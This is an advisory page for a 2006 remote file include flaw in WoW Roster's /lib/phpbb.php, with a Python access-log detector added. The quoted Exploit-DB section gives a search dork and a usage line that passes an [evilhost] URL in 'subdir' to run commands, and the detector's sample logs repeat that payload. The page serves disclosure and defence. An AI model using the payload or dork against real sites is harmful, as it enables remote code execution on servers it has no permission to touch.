Vendor: World of Warcraft (WoW) Roster
By: milw0rm.com
CVSS: 8.8 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: World of Warcraft (WoW) Roster
Affected Version From: 1.0
Affected Version To: 1.7.3
Patch Exists: YES
Related CWE: N/A
CPE: a:wowroster:world_of_warcraft_roster
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability

A vulnerability exists in World of Warcraft (WoW) Roster, which can be exploited by malicious people to conduct remote file include attacks. This is due to the application not properly sanitizing user-supplied input passed via the 'subdir' parameter to the '/lib/phpbb.php' script. Successful exploitation allows execution of arbitrary PHP code.

Mitigation:

Validate and sanitize the user-supplied 'subdir' parameter before '/lib/phpbb.php' uses it, so that request input cannot determine which file is included.
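
A detection check for the request shape described above, added here as an example and not part of the original advisory or the WoW Roster code base: it scans web server access-log lines for requests to '/lib/phpbb.php' whose 'subdir' parameter carries a URL instead of a local directory name. The combined log format, the function names and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A leading scheme (http:, ftp:, php:, data:, ...) or protocol-relative //host
# means the value names a remote or wrapped resource, not a local directory.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.IGNORECASE)
SCRIPT_SUFFIX = "/lib/phpbb.php"   # script named in the advisory
PARAM = "subdir"                   # parameter named in the advisory

def remote_subdir(line):
    """Return the decoded 'subdir' value when the line is a request to
    lib/phpbb.php that passes a URL in 'subdir'; otherwise return None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    try:
        target = urlsplit(match.group(1))
    except ValueError:              # malformed request target
        return None
    if not unquote(target.path).lower().endswith(SCRIPT_SUFFIX):
        return None
    # parse_qsl percent-decodes names and values once, as PHP does for $_GET.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == PARAM and REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, subdir_value) for every flagged line."""
    hits = []
    for line in lines:
        value = remote_subdir(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Aug/2006:10:00:01 +0000] "GET /roster/lib/phpbb.php?subdir=http://198.51.100.7/cmd.txt?&cmd=ls HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/Aug/2006:10:00:09 +0000] "GET /roster/lib/phpbb.php?subdir=http%3A%2F%2F198.51.100.7%2Fcmd.txt HTTP/1.1" 200 512',
    '192.0.2.44 - - [02/Aug/2006:10:01:00 +0000] "GET /roster/lib/phpbb.php?subdir=addons/ HTTP/1.1" 200 2048',
    '192.0.2.44 - - [02/Aug/2006:10:01:30 +0000] "GET /roster/index.php?ref=http://example.org/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} subdir={value}")
```

Access logs record only the query string, so a 'subdir' value sent in a POST body is not visible to this check.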

Exploit-DB raw data:

--------------------------------------------------------------------------------

Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability

--------------------------------------------------------------------------------

Affected software description :

Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/

--------------------------------------------------------------------------------

dork        : "wow roster version 1.*"
Exploit     :

--------------------------------------------------------------------------------

Usage:

http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls

--------------------------------------------------------------------------------

greets:

XLR, rdy, wiggle, phreek, menx [...]

special greet: my old gf ;)

--------------------------------------------------------------------------------

Contact:

Nick: |peti on irc.quakenet.org/irc.efnet.net

--------------------------------- [ eof ] --------------------------------------

# milw0rm.com [2006-08-02]